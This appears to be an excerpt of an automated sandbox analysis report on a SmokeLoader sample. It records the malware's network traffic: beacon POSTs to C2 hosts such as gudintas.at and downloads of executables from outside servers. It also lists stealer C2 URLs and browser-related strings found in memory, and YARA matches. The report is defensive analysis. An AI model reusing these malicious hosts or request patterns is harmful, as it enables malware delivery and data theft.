00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /tmp/ HTTP/1.1Connection: Keep-AliveAccept: */*Referer: http://iyfrm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kingpirate.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fonbcdn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wiygrw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jgmkwutmh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcelay.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovwtbanhhy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbuoguprst.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wqhjt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pyecln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mpurr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upwicfou.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wofwvlfk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: gudintas.at
                  Source: global trafficHTTP traffic detected: GET /186.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: h170811.srv22.test-hf.su
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hnpeauvsal.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rutca.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: gudintas.at
                  Source: global trafficHTTP traffic detected: GET /ofdskiewerews/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.149.185.139
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slodfljw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqstp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cymki.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdyds.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vashlnsk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwqywgiplc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mefip.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcdnqqhwdw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyeap.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kjhodokd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://giswtqwpwp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmvxkv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcftd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://swtffsdvpj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkeyu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bxhcxj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wnprjuxp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://goribni.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://knvwsy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhqwmyg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: gudintas.at
                  Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iyfrm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: kingpirate.ru
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewIP Address: 211.59.14.90 211.59.14.90
                  Source: explorer.exe, 00000001.00000000.899052492.00007FFA11519000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
                  Source: explorer.exe, 00000001.00000000.899052492.00007FFA11519000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
                  Source: 46A3.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: 46A3.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun//
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/0
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/5
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/a
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/api
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apiI
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apiY7
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apil
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/apilv
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun/i
                  Source: RegAsm.exe, 0000000B.00000002.1051881993.00000000038A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiancejiveimp.fun:80/api
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.000000000529A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/5u
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/Sz#
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/api
                  Source: AppLaunch.exe, 0000000F.00000002.1070510652.00000000075B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/api)
                  Source: AppLaunch.exe, 0000000F.00000002.1070510652.00000000075B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/apillj
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.0000000005246000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/apip7
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/apixJ
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/dz
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/rLDbMMUlr2VHY/t/
                  Source: AppLaunch.exe, 0000000F.00000002.1070510652.0000000007590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/t
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malenursenect.fun/vf
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malncejiveimp.fun/
                  Source: 46A3.exe, 0000000A.00000000.981708915.0000000000332000.00000002.00000001.01000000.00000007.sdmp, 46A3.exe.1.drString found in binary or memory: http://metro.mahapps.com/winfx/xaml/iconpacks
                  Source: explorer.exe, 00000001.00000000.897282890.0000000002E89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adob
                  Source: 46A3.exe.1.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: explorer.exe, 00000001.00000000.898450898.000000000EA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                  Source: explorer.exe, 00000001.00000000.898450898.000000000EA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                  Source: RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegAsm.exe, 0000000B.00000002.1051024783.000000000347D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1051397448.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1070510652.000000000764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
                  Source: RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: explorer.exe, 00000001.00000000.897634595.00000000067AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://java.sun.com
                  Source: RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                  Source: RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                  Source: 46A3.exe.1.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: AppLaunch.exe, 0000000F.00000002.1069988032.0000000005246000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegAsm.exe, 0000000B.00000002.1051024783.000000000347D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1051397448.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1070510652.000000000764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                  Source: RegAsm.exe, 0000000B.00000002.1051024783.000000000347D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1051397448.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1070510652.000000000764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
                  Source: AppLaunch.exe, 0000000F.00000002.1070510652.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=.net
                  Source: AppLaunch.exe, 0000000F.00000002.1070510652.000000000763F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1070510652.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/setprefs?sig=0_d7toVxfMKzFj4yeYEy5xHRJrV_I%3D&source=en_ignored_notification&
                  Source: AppLaunch.exe, 0000000F.00000002.1070510652.000000000763F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1070510652.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8.1%26oq%3D
                  Source: unknownDNS traffic detected: queries for: gudintas.at
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00438ECD InternetQueryDataAvailable,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_strlen,HttpSendRequestA,GetProcAddress,InternetQueryDataAvailable,HttpOpenRequestW,InternetCloseHandle,InternetConnectA,GetModuleHandleW,InternetOpenW,InternetReadFile,GetProcAddress,11_2_00438ECD
                  Source: global trafficHTTP traffic detected: GET /tmp/ HTTP/1.1Connection: Keep-AliveAccept: */*Referer: http://iyfrm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kingpirate.ru
                  Source: global trafficHTTP traffic detected: GET /186.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: h170811.srv22.test-hf.su
                  Source: global trafficHTTP traffic detected: GET /ofdskiewerews/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.149.185.139
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Oct 2023 16:05:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/5.4.16Set-Cookie: KPOSESSID=95e0sj81hgog809vlgk9ogkk5u0odbgnruk4mqi64t0odh5g4ic0; expires=Wed, 04-Oct-2023 16:04:47 GMT; path=/; secure; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y%2Fhq1GqZekzilWUuM18m9mByapCumZDbFkkGHiB4ZLYvhPixIrgjDjEIay84ZWDBn%2B8vpufvS5pjNEt%2BdZP0LUIBprlwWeWuzfW%2Ff%2BfzKgVpMrFmqHw%2F8dYbjpIDJ8ap"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81066cf79c273ae8-IADalt-svc: h3=":443"; ma=86400
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.149.185.139
                  Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fonbcdn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: gudintas.at
                  Source: unknownHTTPS traffic detected: 172.67.171.76:443 -> 192.168.2.3:49934 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 0.2.file.exe.23f0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.3.wfshtit.2400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.wfshtit.23f0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.wfshtit.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.2400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.951709724.0000000002431000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.886072573.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000003.940635525.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.951699501.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.899710325.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
